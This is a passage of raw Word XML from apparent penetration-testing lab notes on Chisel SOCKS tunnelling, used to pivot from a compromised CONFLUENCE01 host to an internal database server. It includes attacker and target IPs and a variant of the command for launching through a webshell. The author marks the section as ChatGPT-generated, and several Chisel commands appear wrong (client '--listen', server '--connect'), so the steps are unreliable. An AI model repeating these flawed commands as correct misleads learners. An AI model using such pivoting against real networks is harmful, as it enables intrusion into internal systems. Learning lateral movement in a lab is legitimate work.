        <w:t xml:space="preserve">You are now connected to PGDATABASE01 (visa SSH) through the Chisel local port forward!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A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A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9p5psgtqd0m8" w:id="91"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Dynamic Port forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT so use it with a grain of salt. I would recommend you look at this simple guide below instead, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId226">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAB">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Attacker IP</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192.168.118.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised machine (CONFLUENCE01)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192.168.50.63</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal target (PGDATABASE01)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10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can reach PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">have a shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="985"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no outbound firewall restrictions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CONFLUENCE01 can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept inbound connections on TCP/8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kali.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Chisel to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">create a SOCKS proxy on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which Kali can connect to over HTTP. You’ll then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route traffic through that SOCKS proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the internal network (e.g., SSH, SMB, RDP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the Chisel equivalent of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH dynamic port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -D 1080 user@pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step: Chisel Dynamic Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Start the Chisel client on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets up a SOCKS proxy on CONFLUENCE01, and listens for the Chisel server to connect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client --socks 127.0.0.1:1080 --listen 0.0.0.0:8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--socks 127.0.0.1:1080:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a SOCKS5 proxy on the pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--listen 0.0.0.0:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Listen on port 8080 for incoming Chisel server connections from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ABF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(If 127.0.0.1:1080 doesn't work for local access, you can also try 0.0.0.0:1080 to bind the proxy to all interfaces.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’re injecting this command via a webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client --socks 127.0.0.1:1080 --listen 0.0.0.0:8080 &gt; /dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Start the Chisel server on Kali and connect to CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Kali, connect to the Chisel client’s listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --connect 192.168.50.63:8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This initiates the HTTP tunnel to CONFLUENCE01 and lets you start using the SOCKS proxy running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get a handshake or fingerprint mismatch error, you can add --no-auth on both sides to disable fingerprint auth (only for lab use).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ACF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Use SOCKS proxy on CONFLUENCE01 from Kali via SSH ProxyCommand or proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You now have to point Kali tools to the SOCKS proxy, which lives on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD3">
      <w:pPr>
        <w:rPr/>
